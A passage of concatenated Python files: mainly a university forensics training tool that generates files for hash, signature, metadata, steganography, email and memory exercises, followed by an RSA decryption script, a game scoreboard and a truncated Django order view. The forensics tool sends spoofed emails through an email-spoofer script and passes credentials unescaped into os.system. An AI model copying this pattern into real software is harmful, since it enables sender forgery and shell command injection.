CLASSES\n#-----------------------------------\nclass SERA():\n \"\"\"\n THIS CLASS REPRESENTS THE CONTEXT OF THE SERA SYSTEM\n \"\"\"\n PICTURE = ['cebra.png', 'pinguino.png', 'leon.png', 'hipo.png', 'girafa.png', 'william.png']\n FILETYPE = ['.docx', '.xlsx', '.gif', '.jpg', '.tiff', '.png']\n\n ACT_VAL = ['title', 'code', 'description', 'evaluation']\n STU_VAL = ['name', 'email']\n SYS_VAL = ['path_results', 'path_images', 'path_code', 'path_submissions']\n\n # ---------------------------------\n # CONSTRUCTOR\n # ---------------------------------\n def __init__(self, infoactivity, infostudent, infosystem, fileInput=None):\n\n if fileInput is not None:\n data = self.readContextFrom(fileInput)\n infosystem = data.get('system')\n infoactivity = data.get('activity')\n infostudent = data.get('student')\n\n self.infoactivity = infoactivity\n self.infostudent = infostudent\n self.infosystem = infosystem\n\n\n if not self.checkMinValues():\n str_warning = 'init>> SERA created with incomplete information.\\nActivity:%s\\nStudent:%s\\nSystem:%s' %\\\n (self.infoactivity, self.infostudent, self.infosystem)\n warnings.warn(str_warning)\n\n self.deffilename = '%s_%s' % (self.getStudentName().replace(' ', ''), self.getCode())\n\n\n def checkMinValues(self):\n rx = re.compile('|'.join(list(self.infoactivity.keys()) + list(self.infostudent.keys()) +\n list(self.infosystem.keys())))\n\n min_keys = SERA.ACT_VAL + SERA.STU_VAL + SERA.SYS_VAL\n\n for i in min_keys:\n if not rx.match(i): return False\n\n return True\n\n # ---------------------------------\n # STATIC METHODS\n # ---------------------------------\n @staticmethod\n def getFileType():\n return SERA.FILETYPE\n\n @staticmethod\n def getFileTypeNumber(num):\n if 0<= num <= len(SERA.FILETYPE):\n return SERA.FILETYPE[num]\n else:\n raise ValueError('SERA class>> Unexpected number for FILETYPE array')\n\n # ---------------------------------\n # METHODS TO GET THE VALUES\n # ---------------------------------\n def getFileName(self):\n return self.deffilename\n\n def getCompletePathFileName(self):\n return self.getPathResults() + self.getFileName()\n\n def getTitle(self):\n return self.infoactivity.get('title')\n\n def getDescription(self):\n return self.infoactivity.get('description')\n\n def getCode(self):\n return self.infoactivity.get('code')\n\n def getEvaluation(self):\n return self.infoactivity.get('evaluation')\n\n def getStudentName(self):\n return self.infostudent.get('name')\n\n def getStudentEmail(self):\n return self.infostudent.get('email')\n\n def getPathResults(self):\n return self.infosystem.get('path_results')\n\n def getPathImages(self):\n return self.infosystem.get('path_images')\n\n def getPathSubmissions(self):\n return self.infosystem.get('path_submission')\n\n def getPathCode(self):\n return self.infosystem.get('path_code')\n\n def getSurpisePicturePath(self):\n return self.getPathImages() + '/' + random.choice(SERA.PICTURE)\n\n def isPicture(self, ext):\n rx = re.compile('|'.join(['.gif', '.jpg', '.tiff', '.png']))\n\n return rx.match(ext)\n\n def getFile(self, fileExt=None):\n \"\"\"\n Returns a file generated based on the information available.\n :param fileExt: if None (default) the type of file is random.\n :return: the path (string) to the new file.\n \"\"\"\n if fileExt is None:\n fileExt = random.choice(SERA.FILETYPE)\n\n if self.isPicture(fileExt):\n gd.giveMePicture(self.getTitle(), self.getStudentName(), self.getCompletePathFileName(), fileExt,\n evaluation=self.getEvaluation())\n\n elif fileExt=='.docx':\n gd.giveMeADocx(self.getTitle(), self.getStudentName(), self.getDescription(),\n self.getCompletePathFileName() + '.docx', evaluation=self.getEvaluation(),\n picture=self.getSurpisePicturePath())\n elif fileExt=='.xlsx':\n gd.giveMeAXlsx(self.getTitle(), self.getStudentName(), self.getDescription(),\n self.getCompletePathFileName() + '.xlsx', evaluation=self.getEvaluation(),\n picture=self.getSurpisePicturePath())\n else:\n return None\n\n return self.getCompletePathFileName() + fileExt\n\n def getHelloStudent(self, extension):\n if extension=='.py':\n return gd.giveMeHelloFile(self.getStudentName(), self.getFileName(), '.py', path=self.getPathCode())\n elif extension=='.cpp':\n return gd.giveMeHelloFile(self.getStudentName(), self.getFileName(), '.cpp', '.exe', path=self.getPathCode())\n else:\n return False\n\n def getStegoPath(self):\n return self.getPathImages() + self.getFileName() + '_stego.png'\n\n def getStegoImage(self, text=None):\n image = self.getSurpisePicturePath()\n if text is None:\n #Random!\n basetext = \"Un %s me dijo que sin %s no hay %s, pues depende de para qué. Esto es aleatorio. \" \\\n \"Indica en el formulario esta palabra: %s\"\n r1 = random.choice(['periquito', 'babyshark', 'buho', 'chorlito', 'alumno', 'listo', 'iluminado',\n 'apostol', 'tartamudo', 'algo'])\n r2 = random.choice(['timidez', 'aventura', 'fuerza', 'sacrificio'])\n r3 = random.choice(['recompensa', 'exito', 'fracaso', 'caida', 'altura'])\n r4 = random.choice(['ALEGRIA', 'TRISTEZA', 'VENGANZA', 'LOCURA', 'PASION'])\n text = basetext % (r1, r2, r3, r4)\n\n secret = lsb.hide(image, text)\n pathstego = self.getStegoPath()\n secret.save(pathstego)\n\n return pathstego\n\n def getStegoMessage(self):\n \"\"\"\n :return: secret message saved in the picture.\n \"\"\"\n clear_message = lsb.reveal(self.getStegoPath())\n\n return clear_message\n\n def getDict(self):\n \"\"\"\n :return: this object expressed as dictionary.\n \"\"\"\n return {\"activity\":self.infoactivity, \"student\":self.infostudent, \"system\":self.infosystem}\n\n\n def sendEmail(self, username, password, sender, sender_name, subject, file=None, smtp_server=\"mail.smtp2go.com\", port=\"587\"):\n \"\"\"\n Sends SERA email to this user.\n :param username: username used to send emails using the smtp server (if required).\n :param password: password to be used for the username (if required).\n :param sender: emisor of this email.\n :param sender_name: name of the sender.\n :param subject: subject of the email.\n :param file: htlm file to be sent in the body.\n :return: true if the email was sent.\n \"\"\"\n\n recipients = self.getStudentEmail()\n\n if file is None:\n file = gd.generaHTLM_email(self.getPathImages() + \"fakehtmlemail.html\",\n self.getPathResults() + self.getFileName() + \".html\",\n \"Student\", self.getStudentName())\n\n if smtp_server==\"mail.smtp2go.com\":\n spoofstring = \"--host %s --port %s --username %s --password %s --sender %s --name \\\"%s\\\" --recipients %s \" \\\n \"--subject \\\"%s\\\" --filename %s\" % (\n smtp_server, port, username, password, sender, sender_name, recipients, subject, file)\n cmd = \"test/email-spoofer-py/spoof.py %s\" % spoofstring\n os.system(cmd)\n return True\n\n return False\n\n # ---------------------------------\n # MODIFICATION METHODS\n # ---------------------------------\n def setFileName(self, filename):\n self.deffilename = filename\n\n def save(self, fileName=None):\n \"\"\"\n Save this context into a file (json)\n :param fileName: name of the file to save this context. If None then fileName == self.getFileName()\n :return: path of the new file (if any)\n \"\"\"\n if fileName is None:\n fileName = self.getFileName()\n\n values = self.getDict()\n\n # write values:\n with open('%s%s.json' % (self.getPathResults(),fileName), 'w') as outfile:\n json.dump(values, outfile)\n\n return self.getPathResults() + fileName\n\n def readContextFrom(self, filePathName=None):\n \"\"\"\n Read JSON context from a file\n :param filePathName: path and name for the file\n :return: dict representing the context\n \"\"\"\n if filePathName is None:\n filePathName = self.getCompletePathFileName() + '.json'\n\n with open(filePathName) as json_file:\n data = json.load(json_file)\n\n return data\n\n\n\n\n # ---------------------------------\n # REDEFINED METHODS\n # ---------------------------------\n def __str__(self):\n str = 'Title:%s\\n' \\\n 'Code:%s\\n' \\\n 'Description:%s\\n' \\\n 'Evaluation:%s\\n'\\\n 'Student:%s, %s' % \\\n (self.getTitle(), self.getCode(), self.getDescription(), self.getEvaluation(), self.getStudentName(),\n self.getStudentEmail())\n return str\n\n#-----------------------------------\n# AUXILIAR METHODS\n#-----------------------------------\ndef changeFileExtension(file):\n \"\"\"\n Change the extension of a file\n :param file: file to work with.\n :return: New complete name of the file.\n \"\"\"\n new_extension = random.choice(SERA.FILETYPE)\n pre, ext = os.path.splitext(file)\n newname = pre + new_extension\n os.rename(file, newname)\n\n return newname\n\n\ndef checkhash():\n a2 = input('Select file:')\n if not os.path.isfile(a2):\n print('File not found')\n return False\n a3 = True\n while a3:\n print(\"\"\"\n Choose algorithm:\n [1] md5\n [2] sha256\n [3] sha1\n [*] Back to menu (different value)\n \"\"\")\n a3 = input(\"Your answer is: \")\n a3 = int(a3)\n if 1 <= a3 <= 3:\n values = ['md5', 'sha256', 'sha1']\n alg = values[a3-1]\n a4 = input('Provide hash value:')\n if (fo.checkhash(a2, a4, alg)):\n print('Well done!!')\n a3 = False\n else:\n print('Different values, please try again')\n\ndef checksignature():\n a2 = input('Select file:')\n if not os.path.isfile(a2):\n print('File not found')\n return False\n a3 = True\n while a3: # same order as SERA.FILETYPE\n print(\"\"\"\n Choose type of file:\n [1] Microsoft Word (.docx) \n [2] Microsoft Excel (.xlsx)\n [3] Gif (.gif)\n [4] JPEG (.jpg)\n [5] TIFF (.tiff)\n [6] PNG (.png)\n [*] Back to menu (different value)\n \"\"\")\n a3 = input(\"Your answer is: \")\n a3 = int(a3)\n if 1 <= a3 <= 6:\n chosen = SERA.getFileTypeNumber(a3-1)\n if a3 == 4: chosen ='JPEG'\n if (fo.checksignature(a2, chosen)):\n print('Well done!!')\n a3 = False\n else:\n print('Different values, please try again')\n else:\n a3=False\n\ndef checkmetadata(option, sample):\n if not isinstance(sample, SERA):\n print('Select a context first please (options 1 or 2)')\n return False\n\n if option == 'METACHALL1': #\"Chooses a metadata and ask for its value to the user\"\n file = sample.getFile(None)\n\n # Get metadata\n res = fo.getMeta(file)\n\n if res:\n # Propose a random challenge:\n metafields = list(res.keys())\n mf = random.choice(metafields)\n\n ans = 'Y'\n while ans != 'E':\n print('What is the value for the metadata field \"%s\" in the file %s? (Write \\'E\\' for exit)' % (mf, file))\n ans = input('Your answer: ')\n\n if res[mf] == ans:\n print('Correct!!')\n return True\n\n else:\n print('Upps try again...')\n ans = True\n\n elif option == 'METACHALL2': #\"Request the user to change the metadata of the file\"\n # Generate empty file:\n file = sample.getFile(None)\n\n # Propose the challenge:\n meta = sera.getStudentName().replace(' ', '')\n value = fo.hash(file,'md5')\n print('Include the the metadata %s:%s in the file: %s' % (meta, value, file))\n\n ans = 'k'\n while ans not in ['Y', 'E']:\n ans = input(\"Say 'Y' when you finish, 'E' to return the main manu: \")\n\n if ans == 'Y':\n # Check metadata\n if fo.isMetadata(meta, value, file):\n print('This is correct!!')\n return True\n else:\n print('Try again...')\n return False\n\n\ndef useCaseAnalysis():\n a3 = True\n while a3:\n print(\"\"\"\n Choose:\n [1] Select random use case\n [2] Receipt, She Wrote\n [3] Tupper-Fish\n [*] Back to menu (different value)\n \"\"\")\n a3 = input(\"Your answer is: \")\n a3 = int(a3)\n tags = ['receta', 'fish']\n if 1 <= a3 <= 3:\n if a3 == 1:\n t = random.choice(tags)\n else:\n t = tags[a3-2]\n\n chosen = fo.UseCase(fo.UseCase.getExammpleUseCaseList().get(t))\n print('Use case chosen:%s' % chosen.getName())\n\n # Update questions for Use Case:\n total_questions = chosen.updateQuestionsUC()\n\n # Ask questions:\n asked = []\n total = len(total_questions)\n correct = 0\n while ans.upper() != 'E' and (len(asked) < total):\n print(\"** Preparing random question (E to return the main menu) **\")\n q = chosen.getQuestionUC(chosen, asked, avoidGen=False)\n\n if len(q) > 0:\n print(\"Question: %s\" % q)\n ans = input(\">\")\n\n # Validate question:\n ans_system = fo.answerQuestionUC(chosen, q)\n if isinstance(ans_system, list):\n rx = re.compile('|'.join(ans_system))\n if rx.match(ans):\n print('Correct!!')\n correct += 1\n\n elif isinstance(ans_system, str) and (ans.upper() == ans_system.upper()):\n print('Correct!!')\n correct += 1\n else:\n print('The correct answer is: %s' % ans_system)\n\n asked = asked + [q]\n\n if ans.upper() != 'E':\n print('Congrats!! No more questions!!')\n print(\"Results: \\nNumber of questions:%s\\nNumber of correct answers:%s\\nPoints (over 10):%s\" %\n (total, correct, (correct * 10) / total))\n\n\n else:\n a3=False\n\n#-----------------------------------\n# TESTING METHODS\n#-----------------------------------\ndef getInfoSamples():\n # --- Parameters received from the system:\n # Information about the Activity:\n infoactivity = {\"title\":\"SERA-Signature\", \"code\":\"SERAIF\",\n \"description\":\"Calcula la signatura para comprobar si corresponde con la extensión\",\n \"evaluation\": \"+1 if the signature is correct\"}\n\n # Information about the Student:\n infostudent = {\"name\":\"Ana Nieto\", \"email\":\"nieto@lcc.uma.es\"}\n\n # Information about the System:\n infosystem = {\"path_results\":\"tmp/\",\n \"path_images\":\"resources/picture\",\n \"path_code\":\"resources/code\"}\n\n return SERA(infoactivity, infostudent, infosystem)\n\n\ndef runSamples():\n sample = getInfoSamples()\n\n SERAact = sample.getTitle()\n SERAdesc = sample.getDescription()\n eval = sample.getEvaluation()\n student = sample.getStudentName()\n filename = sample.getCompletePathFileName()\n\n gd.giveMeADocx(SERAact, student, SERAdesc, filename + '.docx', evaluation=eval, picture=sample.getSurpisePicturePath())\n gd.giveMeAXlsx(SERAact, student, SERAdesc, filename + '.xlsx', evaluation=eval, picture=sample.getSurpisePicturePath())\n\n gd.giveMeHelloFile(student, filename, '.py')\n\n gd.giveMeHelloFile(student, filename, '.cpp', '.exe')\n\n gd.giveMePicture(SERAact, student, filename, '.png', evaluation=eval)\n gd.giveMePicture(SERAact, student, filename, '.jpg', evaluation=eval)\n gd.giveMePicture(SERAact, student, filename, '.gif', evaluation=eval)\n\n return sample\n\n#-----------------------------------\n# MAIN METHOD\n#-----------------------------------\ndef main_options():\n sample = None\n ans = True\n while ans:\n print(\"\"\"\n Choose the action:\n [1] Run sample \n [2] Read context from json file\n [3] Show context\n [4] Generate random file \n [5] Generate random file and change the extension randomly\n [6] Delete current context\n [7] Check hash\n [8] Check signature\n [9] Analyse metadata\n [10] Check metadata\n [11] Check secret\n [12] Analyse email\n [13] File System analysis\n [14] Memory analysis\n [15] Use case analysis\n [16] Exit\n \"\"\")\n\n ans = input(\"Your answer is: \")\n if ans=='1': #[1] Run sample\n if sample is None:\n sample = runSamples()\n else:\n a2 = input('This option deletes the current context and generates a new one. Are you sure?[Y/N]')\n if a2.upper()=='Y': sample = runSamples()\n if sample: print('Files created in %s' % sample.getPathResults())\n\n elif ans=='2': #[2] Read files to generate context\n fileName = input('Your file:')\n if not os.path.isfile(fileName):\n print('Please, provide a file')\n else:\n sample = SERA(None, None, None, fileName)\n if sample is not None:\n print('Context loaded from file %s' % fileName)\n\n elif ans=='3': #[3] Show context\n if sample is not None:\n print(sample)\n else:\n print('Select a context first please (options 1 or 2)')\n\n elif ans == '4': #[4] Generate random file\n if isinstance(sample, SERA):\n # Get random file\n location = sample.getFile(None)\n if location is not None:\n print('File generated in:'+location)\n else:\n print('File not created, please check the context (3)')\n else:\n print('Select a context first please (options 1 or 2)')\n\n elif ans=='5': #[5] Generate random file and change the extension randomly\n if isinstance(sample, SERA):\n # Get random file\n location = sample.getFile(None)\n if location:\n print('File generated in:' + location)\n # Change the file extension\n newlocation = changeFileExtension(location)\n print('File changed:' + newlocation)\n else:\n print('File not created, please check the context (3)')\n else:\n print('Select a context first please (options 1 or 2)')\n\n elif ans == '6': #[6] Delete current context\n a2 = input('This option deletes the current context. Are you sure?[Y/N]')\n if a2=='Y':\n sample = None\n print('Context deleted')\n\n elif ans=='7': #[8] Check hash\n checkhash()\n\n elif ans=='8': #[9] Check signature\n checksignature()\n\n elif ans=='9': #[10] Analyse metadata\n if isinstance(sample, SERA):\n checkmetadata('METACHALL1', sample)\n else:\n print('Select a context first please (options 1 or 2)')\n\n elif ans == '10': # [11] Check metadata\n if isinstance(sample, SERA):\n checkmetadata('METACHALL2', sample)\n else:\n print('Select a context first please (options 1 or 2)')\n\n elif ans=='11': #[12] Check secret\n None\n\n elif ans=='12': #[13] Analyse email\n if isinstance(sample, SERA):\n # Send email:\n #sample.sendEmail(username, password, \"ejemplo@sera.com\", \"Ana Nieto\", \"SERA notification\")\n # Wait for the student to copy the email:\n #file = input('Please, 1. save the email received, 2. copy it to the folder and 3. provide the '\n # 'path to the file:')\n file = input('Path to the .eml file (email saved): ')\n # Ask questions:\n asked = []\n total = len(fo.PARSE_QUESTIONS_EMAIL.values())\n correct = 0\n while ans.upper()!='E' and (len(asked) < total):\n print(\"** Preparing random question (E to return the main menu) **\")\n q = fo.getQuestionEmail(asked)\n\n if len(q) > 0:\n print(\"Question: %s\" % q)\n ans = input(\">\")\n\n # Validate question:\n ans_system = fo.answerQuestionEmail(file, q)\n if isinstance(ans_system, list):\n rx = re.compile('|'.join(ans_system))\n if rx.match(ans):\n print('Correct!!')\n correct +=1\n\n elif isinstance(ans_system, str) and (ans.upper() == ans_system.upper()):\n print('Correct!!')\n correct += 1\n else:\n print('The correct answer is: %s' % ans_system)\n\n asked = asked + [q]\n\n if ans.upper()!='E':\n print('Congrats!! No more questions!!')\n print(\"Results: \\nNumber of questions:%s\\nNumber of correct answers:%s\\nPoints (over 10):%s\" %\n (total, correct, (correct*10)/total))\n\n\n else:\n print('Select a context first please (options 1 or 2)')\n\n # elif ans == '13': # File System analysis\n elif ans == '14': # Memory analysis\n if isinstance(sample, SERA):\n print('Select one of the following options:\\n' +\n ' [1] Choose the path for the memory to analyse\\n'\n ' [*] Any other value to assign random memory ')\n ans = input('Your answer:')\n if ans == 1:\n file = input('Please, provide the name of the file: ')\n if not os.path.isfile(file):\n print('Impossible load the file, your file will be chosen randomly...')\n file = fo.getRandomMemoryChoice()\n else:\n file = fo.getRandomMemoryChoice()\n print('This is your memory file: %s' % file)\n\n # Ask questions:\n asked = []\n total = len(fo.PARSE_QUESTIONS_MEMORY.values())\n correct = 0\n while ans.upper() != 'E' and (len(asked) < total):\n print(\"** Preparing random question (E to return the main menu) **\")\n q = fo.getQuestionMemory(asked)\n\n if len(q) > 0:\n print(\"Question: %s\" % q)\n ans = input(\">\")\n\n # Validate question:\n ans_system = fo.answerQuestionMemory(file, q)\n if isinstance(ans_system, list):\n rx = re.compile('|'.join(ans_system))\n if rx.match(ans):\n print('Correct!!')\n correct += 1\n\n elif isinstance(ans_system, str) and (ans.upper() == ans_system.upper()):\n print('Correct!!')\n correct += 1\n else:\n print('The correct answer is: %s' % ans_system)\n\n asked = asked + [q]\n\n if ans.upper() != 'E':\n print('Congrats!! No more questions!!')\n print(\"Results: \\nNumber of questions:%s\\nNumber of correct answers:%s\\nPoints (over 10):%s\" %\n (total, correct, (correct * 10) / total))\n\n\n else:\n print('Select a context first please (options 1 or 2)')\n\n\n elif ans == '15': # Use case analysis\n useCaseAnalysis()\n\n elif ans=='16': #Exit\n ans = False\n\n else:\n print('\\n Not valid choice, please try again')\n\n print('\\nBye!!')\n\n\nif __name__ == \"__main__\":\n # Generation options\n [GEN_FILE, GEN_CHANGE_EXT, GEN_HASHALG, GEN_METACHALL1, GEN_METACHALL2, GEN_SPOOF_ARGS, GEN_MEM, GEN_UC] = \\\n ['GENERA', 'GENERAEXT', 'HASHALG', 'METACHALL1', 'METACHALL2','SPOOF_ARGS', 'GEN-MEM', 'GEN-UC']\n\n # Checking options\n [CHECK_HASH, CHECK_SIGNATURE, CHECK_METAVALUE, CHECK_METADATA, CHECK_EMAILANALISIS, CHECK_MEMORY, CHECK_UC] = \\\n ['CHECK-HASH', 'CHECK-SIGNATURE', 'METAVALUE', 'METADATA', 'EMAILANALISIS', 'CHECK-MEMORY', 'CHECK-UC']\n\n if (len(sys.argv)==1):\n main_options()\n exit()\n\n inputs = json.loads(sys.argv[1])\n opinfo = inputs.get('op')\n op = opinfo.get('op')\n activity = inputs.get('activity')\n student = inputs.get('student')\n system = inputs.get('system')\n\n if op.upper() == GEN_FILE:\n sample = SERA(activity, student, system)\n location = sample.getFile(None)\n if location:\n print(location,end='')\n\n elif op.upper() == GEN_CHANGE_EXT:\n sample = SERA(activity, student, system)\n location = sample.getFile(None)\n if location:\n # print('File generated in:' + location)\n # Change the file extension\n newlocation = changeFileExtension(location)\n print(newlocation,end='')\n\n else:\n print('Error, no file',end='')\n #print('File not created, please check the context (3)')\n\n elif op.upper() == GEN_HASHALG:\n alg = random.choice(fo.ALG)\n print(alg, end='')\n\n elif op.upper() == GEN_METACHALL1:#\"Returns a metadata to be checked\"\n file = opinfo.get('file')\n\n if not os.path.isfile(file):\n print('', end='')#Error, no file',end='')\n\n sera = SERA(activity, student, system)\n\n # Propose a random challenge:\n res = fo.getMeta(file)\n metafields = list(res.keys())\n mf = random.choice(metafields)\n\n if res:\n print(mf,end='')\n else:\n print('')\n\n elif op.upper() == GEN_METACHALL2:#\"Returns metadata to be included\"\n file = opinfo.get('file')\n\n if not os.path.isfile(file):\n print('')\n\n print(student,end='')\n\n elif op.upper() == GEN_SPOOF_ARGS: # Sends a string with the arguments to send a fake mail using\n # python3 spoof.py cli\n sample = SERA(activity, student, system)\n smtp_server = \"mail.smtp2go.com\"\n port = \"587\"\n username = opinfo.get('username')\n password = opinfo.get('password')\n sender= gd.getFakeEmail() # Fake email to be used #\"serasystem@fakemail.com\"\n sender_name = \"Sera SYSTEM\"\n recipients = sample.getStudentEmail()\n subject = \"Este es un mensaje de SERA system\"\n\n file = gd.generaHTLM_email(sample.getPathImages() + \"fakehtmlemail.html\",\n sample.getPathResults() + sample.getFileName()+\".html\",\n \"Student\", sample.getStudentName())\n spoofstring = \"--host %s --port %s --username %s --password %s --sender %s --name \\\"%s\\\" --recipients %s \" \\\n \"--subject \\\"%s\\\" --filename %s\" % (smtp_server, port, username, password, sender, sender_name,\n recipients, subject, file)\n\n print(spoofstring, end='')\n\n\n elif op.upper() == GEN_MEM: # Sends a string with the name of a memory dump to be used\n #mem = fo.UseCase.get_UC_Evidence(fo.UseCase.getMemoryTraining(), value=fo.UseCase.MEMORY, list=True)\n cho = fo.getRandomMemoryChoice()\n print(cho, end='')\n\n elif op.upper() == GEN_UC:\n a=1\n\n\n elif op.upper()== CHECK_SIGNATURE:\n file = opinfo.get('file')\n chosen = opinfo.get('chosen')\n\n if not os.path.isfile(file):\n print(\"[{text:'Error, no file found'}]\", end='')\n\n elif not fo.checksignature(file, SERA.getFileTypeNumber(int(chosen)-1)):\n print(\"[{text:'Try again. Open the file with the chosen Hex Editor and check the first bytes'}]\", end='')\n else:\n print('', end='')\n\n elif op.upper() == CHECK_HASH:\n file = opinfo.get('file')\n chosen = opinfo.get('chosen')\n hashtype = opinfo.get('hash')\n\n if not os.path.isfile(file):\n print('Error, invalid file',end='')\n elif not fo.checkhash(file, chosen, hashtype):\n print('You must calculate the hash of the file using the algorithm', end='')\n\n elif op.upper() == CHECK_METAVALUE:\n \"Checks a value for a metadata\"\n file = opinfo.get('file')\n metadata = opinfo.get('metadata')\n value = opinfo.get('chosen')\n\n metafile = fo.getMeta(file)\n\n if not os.path.isfile(file) or not isinstance(metafile, dict):\n print(\"[{text:'Error, no file found'}]\", end='')\n\n elif str(metafile.get(metadata)) != value:\n print(\"[{text:'Check the metadata using the applications recommended in class'}]\", end='')\n\n else:\n print('',end='')\n\n elif op.upper() == CHECK_METADATA:#\"Checks if the metadata exists in a document\"\n file = opinfo.get('file')\n metachallenge = opinfo.get('metadata')\n\n if not os.path.isfile(file) or not isinstance(metachallenge, str):\n print(\"[{text:'Error, no file found'}]\", end='')\n\n # metadata included in the file:\n metafile = fo.getMeta(file)\n\n # metadata to be checked:\n metadata = json.loads(metachallenge)\n\n included = [k for k in metadata if k in list(metafile.keys()) and metafile.get(k) == metadata.get(k)]\n\n if len(included)==len(metadata):\n print('', end='') #Correcto\n else:\n print(\"[{text:'Please, check that the metadata has been added using the applications recommended in class'}]\", end='')\n\n\n elif op.upper()== CHECK_EMAILANALISIS: # perform questions about an email previously sended.\n opkeys = list(opinfo.keys())\n\n if \"answerto\" in opkeys:\n # check the answers to the questions\n answers = opinfo.get(\"answerto\")\n file = opinfo.get(\"file\")\n\n total = len(answers)\n correct = 0\n for q in answers:\n ans = answers[q]\n # Validate question:\n ans_system = fo.answerQuestionEmail(file, q)\n if isinstance(ans_system, list):\n rx = re.compile('|'.join(ans_system))\n if rx.match(ans):\n correct += 1\n\n elif isinstance(ans_system, str) and (ans.upper() == ans_system.upper()):\n correct += 1\n if correct < total:\n sentence = 'Please review your answers.\\nNumber of questions:%s, Correct:%s. ' \\\n 'Points(over 10):%s' % (total, correct, (correct*10)/total)\n print(\"[{text:'%s'}]\" % sentence, end='')\n\n\n else:\n # provide question\n avoid = opinfo.get(\"avoid\")\n question = fo.getQuestionEmail(avoid)\n print(question, end='')\n\n elif op.upper() == CHECK_MEMORY: # perform questions about memory previously chosen\n opkeys = list(opinfo.keys())\n\n if \"answerto\" in opkeys:\n # check the answers to the questions\n answers = opinfo.get(\"answerto\")\n file = opinfo.get(\"file\")\n\n total = len(answers)\n correct = 0\n for q in answers:\n ans = answers[q]\n # Validate question:\n ans_system = fo.answerQuestionMemory(file, q)\n if isinstance(ans_system, list):\n rx = re.compile('|'.join(ans_system))\n if rx.match(ans):\n correct += 1\n\n elif isinstance(ans_system, str) and (ans.upper() == ans_system.upper()):\n correct += 1\n if correct < total:\n sentence = 'Please review your answers.\\nNumber of questions:%s, Correct:%s. ' \\\n 'Points(over 10):%s' % (total, correct, (correct*10)/total)\n print(\"[{text:'%s'}]\" % sentence, end='')\n\n\n else:\n # provide question\n avoid = opinfo.get(\"avoid\")\n question = fo.getQuestionMemory(avoid)\n print(question, end='')\n\n else:\n print('')\n #print('error')\n\n #Send back data\n sys.stdout.flush()\n\n\n","repo_name":"cadirneca/sera-forensics","sub_path":"seraforensics.py","file_name":"seraforensics.py","file_ext":"py","file_size_in_byte":34450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16165035239","text":"#Descifrado RSA.\nimport time\n\n#Función de descifrado.\ndef descifrar(menCif,d,n):\n mensDescif=[]\n for k in menCif:\n decryp = (int(k)**d) % n\n mensDescif.append(chr(decryp))\n return mensDescif\n\n#Recepción de mensaje cifrado y clave privada.\nlineas = int(input('Ingrese la cantidad de mensajes desea descifrar: '))\nprint()\nfor i in range(lineas):\n menCis = input('Ingrese la lista de números que desea decodificar,' +\n ' separados por coma y espacio: ').split(\",\")\n d = int(input('Ingrese el valor d de la clave privada (d,n): '))\n n = int(input('Ingrese el valor n de la clave privada (d,n): '))\n x = time.time()*1000\n mensajeDescifrado = descifrar(menCis,d,n)\n mensajeDescifrado=\"\".join(mensajeDescifrado)\n print('Su mensaje descifrado es:', mensajeDescifrado)\n y = time.time()*1000\n print(\"El tiempo de descifrado fue de:\", y-x, \"milisegundos\")\n print()\n","repo_name":"dzambranob/Proyecto-Discretas","sub_path":"DescifradoRSA.py","file_name":"DescifradoRSA.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21125707451","text":"import pygame.font\r\n\r\nclass Scoreboard():\r\n def __init__(self, aiSettings, screen, stats):\r\n self.screen = screen\r\n self.screenRect = screen.get_rect()\r\n self.aiSettings = aiSettings\r\n self.stats = stats\r\n\r\n self.textColor = (255, 255, 255)\r\n self.font = pygame.font.SysFont('Comic Sans MS', 22)\r\n\r\n self.prepScore()\r\n self.prepLive()\r\n self.prepHScore()\r\n\r\n def prepScore(self):\r\n scoreStr = 'Score: ' + str(self.stats.score)\r\n self.scoreImg = self.font.render(scoreStr, True, self.textColor)\r\n\r\n self.scoreRect = self.scoreImg.get_rect()\r\n self.scoreRect.center = self.screenRect.center\r\n self.scoreRect.top = 10\r\n\r\n def showScore(self):\r\n self.screen.blit(self.scoreImg, self.scoreRect)\r\n\r\n def prepLive(self):\r\n liveStr = 'Lives: ' + str(self.stats.shipLives)\r\n \r\n self.liveImg = self.font.render(liveStr, True, self.textColor)\r\n\r\n self.liveRect = self.scoreImg.get_rect()\r\n self.liveRect.left = self.screenRect.left + 20\r\n self.liveRect.top = 10\r\n\r\n def showLive(self):\r\n self.screen.blit(self.liveImg, self.liveRect)\r\n\r\n # high score of the game is store in the highscore.txt file\r\n def prepHScore(self):\r\n hScore = 0\r\n # get the high score from the file\r\n with open('highscore.txt') as fileObject:\r\n hScore = fileObject.read()\r\n hScoreStr = 'High Score: ' + str(hScore)\r\n self.hScoreImg = self.font.render(hScoreStr, True, self.textColor)\r\n\r\n self.hScoreRect = self.scoreImg.get_rect()\r\n self.hScoreRect.right = self.screenRect.right - 100\r\n self.hScoreRect.top = 10\r\n\r\n def showHScore(self):\r\n self.screen.blit(self.hScoreImg, self.hScoreRect)","repo_name":"MinhDang98/Fun-Projects","sub_path":"Alien Invasion/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16191674474","text":"\nfrom django.http import HttpRequest\nfrom django.shortcuts import render\nfrom .models import Order\nfrom .forms import OrderCreateForm\nfrom cart.cart import Cart\nfrom .models import Product\nfrom . import models\n\ndef order_create(request):\n cart = Cart(request)\n\n\n if request.method == 'POST':\n try:\n object = models.Order.objects.get(user_id=request.user.pk)\n form = OrderCreateForm(request.POST)\n if form.is_valid():\n order = form.save()\n\n for item in cart:\n\n Order.objects.create(product=item,\n price=item['price'],\n quantity=item['quantity'],\n user=request.user)\n\n # очистка корзины\n cart.clear()\n return render(request, 'order_created.html',\n {'order': order})\n except:\n return render(request, 'order.html',\n {'cart': cart, 'form': form})\n else:\n form = OrderCreateForm\n return render(request, 'order.html',\n {'cart': cart, 'form': form})\n\n#def orders(request):\n #orders = Order.objects.all()\n #order_items = OrderItem.objects.all()\n #user_order_items = []\n # for order in order_items:\n # if order.user == request.user:\n#\n # user_order_items.append(order)\n # context = {'order_items': user_order_items}\n # return render(request, 'user_orders.html', context)\n\n\ndef my_orders(request):\n products = Product.objects.all()\n myorders = Order.objects.filter(user_id=request.user)\n product_ordered = OrderItem.objects.all()\n assert isinstance(request, HttpRequest)\n return render(request, 'user_orders.html', {'products': products, 'product_ordered': product_ordered, 'myorders': myorders, 